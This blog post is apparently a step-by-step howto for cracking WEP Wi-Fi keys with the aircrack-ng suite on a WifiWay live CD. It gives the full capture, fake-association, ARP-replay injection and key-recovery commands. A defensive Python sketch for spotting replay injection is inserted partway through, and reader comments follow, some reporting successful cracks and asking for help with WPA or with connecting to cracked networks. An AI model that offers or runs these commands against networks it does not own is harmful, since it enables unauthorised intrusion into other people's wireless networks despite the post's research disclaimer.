Because of a professional need, I had to demonstrate that WEP can be cracked. Even though I 'knew' this could be done, I had never actually done it myself.
Note: This is only for research, learning, and security checking purposes. It shouldn't be used to crack networks owned by other people. Attacking and breaking into networks (or other resources) is bad, and illegal.
Doing some research, I found that the wireless card in my Sony Vaio VGN N350FE (an Intel 3945ABG) didn't allow certain things from Linux, among them one that is necessary to demonstrate this vulnerability.
If you read my previous posts, you'll see that this is not the first problem I have found with hardware.
Nor is it the first I have found a solution for :-)
I found a howto at http://foro.seguridadwireless.net/index.php?topic=3227.0 that I used as a base.
Below are the steps I followed to crack WEP.
We need a Linux distribution available at http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. We download the CD image and burn it.
We boot the notebook with WifiWay (it must be able to boot from optical drives).
Once it has started, we start X:
startx
We set the channel of the AP (Access Point) in the NIC.
echo 'CAPTURE_CHANNEL' > /sys/class/net/wifi0/device/channel
We get the BSSID, the channel and the ESSID.
airodump-ng rtap0
We stop the execution with CONTROL-C, and we set the BSSID (a hex number with 6 positions) in the NIC.
echo 'AP_BSSID' > /sys/class/net/wifi0/device/bssid
Once we do this, we start capturing.
airodump-ng -c CAPTURE_CHANNEL -w CAPTURE_FILE rtap0
We open a new window and set the speed to 2 Mbps:
echo '2' > /sys/class/net/wifi0/device/rate
We activate the NIC.
ifconfig wifi0 up
We look for our MAC address; it's the first 12 numbers stated in HWaddr.
ifconfig
We initiate an association with the AP.
aireplay-ng -1 0 -a AP_BSSID -h MAC_ADDRESS_WIFI -e AP_ESSID wifi0
We open another terminal and start injecting traffic:
aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h MAC_ADDRESS_WIFI wifi0
This should increment the data count in the capture window (it takes a while before it starts incrementing).
When we have over 100,000, we can extract the key by executing:
aircrack-ptw CAPTURE_FILE.cap
This should give us the key in hex format.
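Seen from the defender's side, the injection step above is noisy: WEP has no replay protection, so a re-injected frame goes out with the same IV and length every time, while a normal client uses a fresh IV per frame. The following detection sketch is an added example, not part of the original howto; the record format (timestamp in ms, transmitter MAC, IV, frame length), the thresholds and the sample data are all assumptions constructed for illustration.

```python
from collections import Counter, defaultdict

def build_sample():
    """Constructed records: (ts_ms, transmitter_mac, wep_iv_hex, frame_len)."""
    frames = []
    # Normal client: a fresh IV on every frame, varying lengths, 20 frames/s.
    for i in range(200):
        frames.append((i * 50, "02:00:00:00:00:01", f"{i:06x}", 80 + (i % 7) * 40))
    # Replaying station: one captured frame re-sent verbatim, 500 frames/s.
    for i in range(2000):
        frames.append((2000 + i * 2, "02:00:00:00:00:02", "a1b2c3", 68))
    return sorted(frames)

def detect_wep_replay(frames, window_ms=1000, threshold=100):
    """Flag transmitters that repeat one (IV, length) pair more than
    `threshold` times inside any window_ms-wide time bucket."""
    buckets = defaultdict(Counter)
    for ts_ms, mac, iv, length in frames:
        buckets[ts_ms // window_ms][(mac, iv, length)] += 1
    alerts = {}
    for counts in buckets.values():
        for (mac, iv, length), n in counts.items():
            if n <= threshold:
                continue
            # Keep the busiest bucket per transmitter as the alert evidence.
            if mac not in alerts or n > alerts[mac]["peak"]:
                alerts[mac] = {"iv": iv, "length": length, "peak": n}
    return alerts

if __name__ == "__main__":
    for mac, info in detect_wep_replay(build_sample()).items():
        print(f"possible WEP replay from {mac}: IV {info['iv']} "
              f"len {info['length']} seen {info['peak']}x in one window")
```

A legitimate station should practically never reuse an IV hundreds of times per second, so the threshold can be set low on a real sensor feed.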
I hope this is useful to you.
Cheers!
27 comments:
Hi there! I have a question: your OS is windoze and you actually did that under a Linux distribution, did I get it right?
hi!
my OS is not windows: it is Ubuntu.
you may have windows, or other Linux distros, it doesn't matter because you'll use the live cd, and it will load a Linux distro with all the tools needed.
I hope this helps. Tell me how it goes.
Sebastian
Is this a no-client attack? What about deauth attacks?
I have been trying ipwraw on my Feisty system for two days with little progress. Can't wait to try wifi and your howto
I ran the live cd of wifiway 0.8 and your how to, it worked perfect!!
Would you consider doing a similar HOWTO for WPA?
hi vaio vgn owner
I'm glad to hear that you were able to successfully run the howto!
I am considering writing a howto for cracking WPA, but till now I haven't had time.
If you want me to notify you when I write it, leave me a message with your email (I won't publish it).
Cheers mate!
hi sebastian,
i've tried your howto guide with wifiway 08 on my sony vaio with OS Vista and... it doesn't work
if I type airodump-ng rtap0 the answer is: rtap0 is not a network interface
could you help me?
thanks
mitso
Hi Mitso
What Vaio model are you using? I'm using a VGN-N350FE.
I'll need more info from your system:
Please send me the results of:
lspci
ifconfig
dmesg
We'll try to figure out what's going on.
Cheers mate!
weird thing happens for me, i'm using wifiway .8 and i can do everything when no errors. i'll usually go:
load (which loads ipwraw) and then your steps, but when aireplay is running, it gets no ARG requests, which i assume means injection isn't working. (i have a ipw3945 if that helps)
thanks,
iqbal
hey,
I'm using wifiway .8 and ipw3945
I've tried using the 'load' command/script (loads ipwraw drivers i believe)
then i use your steps
everything runs fine, except when aireplay is running, i get no ARG's whatsoever. Any ideas?
Thanks
Hi Iqbal,
I don't know the 'load' command you are mentioning.
Did you try to follow this howto step by step from scratch?
This howto is meant to work with the ipw3945, so you should have no problems.
Please tell me how it goes.
Good luck!
I figured it out.
On the newest wifiway (.8) you can just type 'airoway.sh' and it's pretty much automated. as far as i know, that only works for ipw3945, i think there is something called airoscript for other cards
hi sebastian, pls can you help me out i got no wi-fi on my computer pls can you help me to crack wep keys on my psp pls!!!pls email me on da504@hotmail.com
Hi Sebastian,
Thanks and it worked, simple and easy.
I did exactly what your walkthrough said and worked great and i got a HP Intel Centrino Duo IPW3945 Chipset. Took me a little while where i was a virgin at the Linux OS but other than that worked great thanks man..
Hi,
I'm having the same problem as iqbal, that is I get no ARP requests, so no packet to replay and consequently no packet injection. The association works fine, though. Any ideas?
I followed your how-to to the letter, using version 0.8 and ipw3945 (Vaio machine).
Thanks,
Jim
Hi Jim,
One question: are you trying to break your own network? or someone else's?
If it is someone else's network, it could be they are filtering by MAC address.
Please note this article is for research, learning, and security checks only. I don't encourage breaking into other people's resources.
hi, i've found a guide for how to use the automated airoway.sh (you type it in the terminal) at http://ctorrecillas.blogspot.com/2007/11/wep-decryption.html . might be something to check out to help you out. it's for wifiway 0.8
Hi,
It is my own network, so I already know everything (WEP 128-bit, no MAC filtering). I am just doing this for fun.
When I connect a client to my AP (from another laptop) after having started the attack, everything works fine. I only get this problem when I try it without having a "real" client.
Is there a way to do it without connecting a client?
Thanks,
Jim
Hi, I'm a fresh linux user but with help of you i managed to get password to wifi network. Unfortunately i have no idea how to use this password now to connect to network. Please help me out. Let me know what kind of command i need to run. i got wifiway 0.8, intel pro 3945 --> wifi0. thanks for help
I tried this on Sony Vaio vgn-tx2hp.
airodump-ng rtap0 works fine.
But I can't run for example echo 'CAPTURE_CHANNEL' > /sys/class/net/wifi0/device/channel
simply because there is no wifi0 folder on my disk.
Is this because Sony Vaio NIC doesn't support this?
Maybe I should plug PCMCIA WiFi card?
I'm new to this and any help appreciated
Dimon
This howto was written using Wifiway 0.6
I cannot guarantee it will work with other versions!
Please try to download and use wifiway 0.6
Cheers!
This works GREAT with my Dell Inspiron 6400.
THANKS!
Now I just need to figure out how to crack WPA with this thing...
I used wifiway 0.8 with the airoway.sh script and it worked with ipw3945. Thanks!
hi man i have vaio vgn fj57gp with intel(R) PRO/Wireless 2200BG card. the method u mentioned here would it work for this card?? as far as i came to know from my research over the net that this card has just one mode:(
awesome tutorial. just one thing to add..
when i was trying my luck, i had extremely frustrating time with getting the network adapter into the monitor mode. i have the Intel PRO Wireless 3945ABG card too, and neither madwifi or mac802 worked for me. but eventually i discovered that the ipwraw-ng driver worked fine with my card. the two pages below were of great help to me if anyone is interested
How to crack WEP with Intel PRO/Wireless 3945ABG
http://www.maxi-pedia.com/how+to+crack+WEP+with+intel+PRO+wireless+3945ABG
How to crack WEP encryption (wifi security)
http://www.maxi-pedia.com/crack+WEP
find tutorial cracking wireless use windows+vmware+usb wifi here >>TUTORIAL CRACK WIRELESS USE WINDOWS<<
Thanks dude, today i just cracking wep in windows. take a few minute for get the key. very2 easy technique. i use usb wifi for alternative because my built in broadcom problem to inject. i just find tutorial at http://wireless-security-system.blogspot.com